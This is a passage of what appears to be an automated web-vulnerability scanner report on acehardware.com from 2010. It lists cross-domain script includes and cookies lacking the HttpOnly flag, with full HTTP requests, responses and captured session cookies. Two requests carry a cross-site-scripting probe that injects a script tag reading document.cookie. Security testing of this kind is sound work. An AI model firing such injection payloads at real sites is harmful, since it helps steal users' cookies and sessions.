<!--Preview TimeZone = 'null' --><!--Preview TimeZo
...[SNIP]...
</title>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.8. http://www.acehardware.com/infohome/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /infohome/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /infohome/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:24 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 77695
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_sitemap.css" />
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
...[SNIP]...
<div id="siteBg">
       

                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.9. http://www.acehardware.com/paintingtips/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /paintingtips/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /paintingtips/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76147
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/paintHub.css" />
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/paintingTips.js"></script>
...[SNIP]...
<div id="siteBg">
       

                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.10. http://www.acehardware.com/product/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /product/index.jsp?productId=4356432&clickFrom=Home%3AFeatured+Products HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?525bf--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac030e2206a=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; rvp=3388719:; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DUndefined%2520Page%253A%2520http%253A//www.acehardware.com/paintingtips/index.jsp%7C1293641650633%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":5,"to":5,"c":"http://www.acehardware.com/paintingtips/index.jsp","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0,"f":1293639577528}; fsr.a=1293639877133; __g_c=w%3A1%7Cb%3A6%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3F525bf--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eac030e2206a%3D1_2___1293639906310%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:25:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e524357145a415c52134c4a56555c570f1d0545551c4f1c00; expires=Monday, 16-Jan-2079 19:40:06 GMT; path=/
Set-Cookie: rvp=4356432:3388719:; expires=Monday, 16-Jan-2079 19:40:06 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</SCRIPT>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_LightBox.js"></script>
   <link href="http://ACE.imageg.net/css/WIZ_ACE_LightBox.css" rel="stylesheet" type="text/css" />
   
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_box.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
<!--You are running on ashprd2_ws_49_2-->


<script type="text/javascript" src="http://ACE.imageg.net/include/expressShop.js"></script>
...[SNIP]...
</div>    

       
                           <script src=http://content.webcollage.net/acehardware/smart-button></script>
...[SNIP]...
</div>
       

           <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_box.js"></script>
<link href="http://ACE.imageg.net/css/WIZ_ACE_box.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_ToolTip.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.11. http://www.acehardware.com/shopbyBrand/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /shopbyBrand/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shopbyBrand/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 408358
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
</style>

       <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
       <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">
               

                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js" ></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

4.12. http://www.acehardware.com/sitemap/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /sitemap/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 120055
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_sitemap.css" />
   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.acehardware.com/category/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 29 Dec 2010 16:23:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; expires=Monday, 16-Jan-2079 19:37:32 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 277

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

5.2. http://www.acehardware.com/family/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /family/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /family/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 29 Dec 2010 16:23:26 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; expires=Monday, 16-Jan-2079 19:37:33 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 277

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

5.3. http://www.acehardware.com/product/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/index.jsp?productId=4356432&clickFrom=Home%3AFeatured+Products HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?525bf--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac030e2206a=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; rvp=3388719:; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DUndefined%2520Page%253A%2520http%253A//www.acehardware.com/paintingtips/index.jsp%7C1293641650633%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":5,"to":5,"c":"http://www.acehardware.com/paintingtips/index.jsp","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0,"f":1293639577528}; fsr.a=1293639877133; __g_c=w%3A1%7Cb%3A6%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3F525bf--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eac030e2206a%3D1_2___1293639906310%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:25:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e524357145a415c52134c4a56555c570f1d0545551c4f1c00; expires=Monday, 16-Jan-2079 19:40:06 GMT; path=/
Set-Cookie: rvp=4356432:3388719:; expires=Monday, 16-Jan-2079 19:40:06 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...

5.4. http://www.acehardware.com/search/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /search/index.jsp

Issue detail

